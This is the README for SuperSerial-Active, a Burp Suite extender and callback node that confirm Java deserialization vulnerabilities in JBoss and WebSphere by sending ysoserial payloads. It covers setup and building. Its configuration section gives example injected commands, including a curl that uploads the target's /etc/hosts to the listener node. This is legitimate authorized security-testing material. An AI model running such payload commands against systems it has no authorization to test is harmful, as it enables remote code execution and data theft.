SuperSerial-Active

SuperSerial-Active - Java Deserialization Vulnerability Active Identification Burp Extender

See Blog: https://www.directdefense.com/superserial-active-java-deserialization-active-identification-burp-extender/

To help our customers and readers definitively identify Java Deserialization vulnerabilities, we have created an additional Burp Suite Extender called “SuperSerial-Active” to compliment our previous release of "SuperSerial-Passive" (https://github.com/DirectDefense/SuperSerial) . Unlike the previous extender, which only passively identifies potential instances of Java deserialization vulnerabilities, this extender actively attempts to exploit the vulnerability in a non-intrusive way. This results in the confirmed identification of a deserialization vulnerability. The exploitation is made possible by making use of the ysoserial library (https://github.com/frohoff/ysoserial). The Extender currently tests only against target systems running the JBoss or WebSphere platforms, but can detect the vulnerability on both Linux and Windows systems running JBoss or WebSphere. Support for detecting the vulnerability on systems running other platforms will be added in future releases of the extender.

Extender Overview

SuperSerial-Active consists of two components, an extender to be loaded into Burp Suite Professional (superserial-active-[VERSION].jar) and a standalone web server Node (SuperSerial Node) written entirely in Java (SuperSerialNode-[VERSION].jar). The extender works by sending a request containing a serialized object exploit payload (generated by ysoserial) from the Burp Suite Active Scanner to the target system. The payload contains an operating system command that is intended to be executed by the target system (both Linux and Windows commands are attempted), specifically to have the target system access the SuperSerial Node via HTTP, or upload a local file to the SuperSerial Node via HTTP. After sending the exploit payload, the extender then communicates with the SuperSerial Node via HTTP to determine whether the Node was accessed by the target system, or if a file was uploaded by the target system. If the Node communicates that either of these events has taken place, the extender then creates a new Scan Issue in Burp Suite to confirm the vulnerability to the user.

Extender Configuration/Usage:

1. Decide where the SuperSerial Node will be hosted.

   • the Node must be accessible directly by the target system (if target system is internet-facing, the node must be hosted with an internet-facing IP address or registered domain name).

   • the Node can be hosted on the same machine that is running Burp Suite, as long as the target system can access it directly.

   • the system running the Node must have Java Runtime Environment 7 or higher installed.

2. Download the SuperSerialNode-[VERSION].jar file on this system.

3. In a terminal, launch the SuperSerial Node:

   • The Node listens on port 15050 by default. To have the Node listen on another port, include the command-line argument --port=[PORT] where [PORT] specifies what port the Node will listen on (ex. java -jar SuperSerialNode.jar --port=8090).

   • All access to the Node is controlled by requiring all client requests to contain an authentication token GUID as a URL parameter (token=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX). This GUID is either generated at runtime or is specified by the user as a command-line argument (--token=[TOKEN]), and is outputted to the console immediately when the Node is started.

   • After termination, the Node does not remove any files that are created for storing uploaded files and access entries. By including the --resume command-line parameter, the Node can "resume" from previous executions and re-create contexts used successfully during these times.

4. The Node will print some information to the console after it has successfully launched. Take note of the Node Authentication Token that is printed to the terminal.

5. On the system running Burp Suite, download the latest superserial-active-[VERSION].jar and ysoserial-master-SNAPSHOT.jar files.

6. In the Extender->Options tab in Burp, check if the Java Environment Settings option is set.

   a. If the option is unset, create a new directory on the system and place the ysoserial-master-SNAPSHOT.jar file in this directory. Set the option to this newly-created directory

   b. If the option is already set, place the ysoserial-master-SNAPSHOT.jar file in the directory set in the option.

7. Load the superserial-active-[VERSION].jar file into Burp in the Extender->Extensions tab. The SuperSerial-Active extender will be loaded but will need to be configured before it can be used.

8. Configure the SuperSerial Node connection settings in the SuperSerial->"Node Connection Settings" tab.

   a. Set the Node Host. It must be set as the domain name or IP address that the target system will use to access the Node

    * Note: If the Node is hosted on the same machine as burp is running, the Node Host must be set to the IP address of this machine, NOT TO 127.0.0.1!
   

   b. Set the Node Port (the port the Node is listening on)

   c. Set the Node Token, which was printed to the console of the SuperSerial Node when it was launched.

   d. Click "Test Connection" and verify that the status pane indicates a successful connection, or change the settings based on the status pane message.

9. Configure Active Scan settings in the SuperSerial->"Scan Settings" tab.

   a. If desired, set the "Scan All" setting to scan all request parameters during active scanning.

    * WARNING: This will GREATLY increase the overall scan time per URL. Only enable this setting if needed.
   

   b. Configure download attempts and wait time:

    * After sending the serialized object exploit payload the extender accesses the node a maximum number of tries (5 by default), waiting a specified amount of time between each try (1.5 seconds by default).
    * Setting low values will allow the Active Scanner to finish more quickly but will increase the likelyhood of failing to detect the vulnerability, therefore higher values are recommended.
   

   c. Enable/Disable the desired ysoserial payload types

   d. Review the operating system commands listed that will be used during Active Scanning.

    * Additional commands can be added to the list that will be used during scanning. In order to detect the vulnerability, the added command must force the target system to access the Node via HTTP:
    	* Commands can be autopopulated with node connection values using the following pre-defined tokens: [NODEHOST], [NODEPORT], [NODEPROTOCOL], [NODEPATH], [NODETOKEN]
    	* ex. curl -X PUT --data-binary @/etc/hosts [NODEPROTOCOL]://[NODEHOST]:[NODEPORT][NODEPATH]?token=[NODETOKEN] will be automatically converted during scanning to: curl -X PUT --data-binary @/etc/hosts http://192.168.1.1:15050/FFFFFFFFFF?token=ABCDEF12-3456-7890-ABCD-EF1234567890
    * Commands are used during active scanning in the order they are listed in the table (top to bottom).
    * Commands that are intended to access the Node (but not upload a file) must also include the URL parameter 'write=true' (curl [NODEPROTOCOL]://[NODEHOST]:[NODEPORT][NODEPATH]?token=[NODETOKEN]&write=true)
   

10. Change filters in the Proxy and Target tabs to display "Other Binary". This will ensure any Scan Issues created by the extender will be displayed to the user.

11. Perform an active scan against any suspected vulnerable URLs. Additionally, the user can view the console output of the SuperSerial Node during the scan to view messages indicating any communication with the Node as it occurs, as well as to diagnose any potential issues. Any exceptions encountered by the extension during scanning (such as when generating payloads) will be printed to the Extender->Errors tab.

12. If a vulnerability is detected by the SuperSerial-Active extender, a new "Java Deserialization Vulnerability" Scan Issue will be created in Burp Suite.

Extender Dependencies:

• ysoserial (for creating serialized object exploit payloads): https://github.com/frohoff/ysoserial (supported versions: >=0.0.3)

• JSON for Java (for properly creating and parsing JSON in extender and Node): https://github.com/douglascrockford/JSON-java (included in release superserial-active-[VERSION].jar and SuperSerialNode-[VERSION].jar files, version 20160212 at time of writing)

Extender Building Instructions:

Requires Java Development Kit 7 or higher

1. Choose folder to use for building (these instructions will use c:\test)

2. Create the following directories (case-sensitive):

   • c:\test\api

   • c:\test\build-extender

   • c:\test\build-node

3. Download the SuperSerial-Active master source zip and extract to directory c:\test (SuperSerial-Active-master directory and sub-directories will be created)

4. Download the Burp Extender interface files

   a. Launch Burp Suite and navigate to the Extender->APIs tab

   b. Click 'Save interface files' button

   c. In the save prompt, navigate to the c:\test\api directory and click 'Save'

5. Create directory (case sensitive): c:\test\api\org

6. Download the latest "JSON for Java" source code .zip file (https://github.com/douglascrockford/JSON-java/releases) and extract to directory: c:\test\api\org

7. Rename the newly extracted directory (JSON-java-[version]) to (case-sensitive): json

8. Copy all contents of the c:\test\api directory into: c:\test\SuperSerial-Active\Extender, overwrite any duplicate files

9. Copy all contents of the c:\test\api into: c:\test\SuperSerial-Active\Node, overwrite any duplicate files

10. Remove folder c:\test\api, it is no longer needed

11. Download the latest ysoserial (https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar) release jar to c:\test

12. To build the SuperSerial-Active Extender, do the following (this will create file c:\test\superserial-active.jar):

    a. In a terminal window, navigate to c:\test

    b. execute command: javac -cp ysoserial-master-SNAPSHOT.jar -d build-extender -sourcepath SuperSerial-Active-master/Extender SuperSerial-Active-master/Extender/burp/*.java SuperSerial-Active-master/Extender/superserial/settings/*.java SuperSerial-Active-master/Extender/superserial/ui/*.java

    c. execute command: jar vcf superserial-active.jar -C build-extender . -C SuperSerial-Active-master/Extender licenses/JSON-LICENSE.txt

13. To build the SuperSerial Node, do the following (this will create file c:\test\SuperSerialNode.jar):

    a. In a terminal window, navigate to c:\test

    b. execute command: javac -d build-node -sourcepath SuperSerial-Active-master/Node SuperSerial-Active-master/Node/superserial/node/*.java

    c. execute command: jar vcfm SuperSerialNode.jar SuperSerial-Active-master/Node/MF.TXT -C build-node . -C SuperSerial-Active-master/Node JSON-LICENSE.txt

Disclaimer:

This software is only intended to be used against systems the user explicitly owns or has authorization to test/attack. The developers provide the software for free without warranty, and assume no responsibility for any damage caused to systems by misusing the software. It is the responsibility of the user to abide by all local, state and federal laws while using the software.

License:

Extender written by Jeff Cap Copyright (C) 2015, 2016 DirectDefense, Inc.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/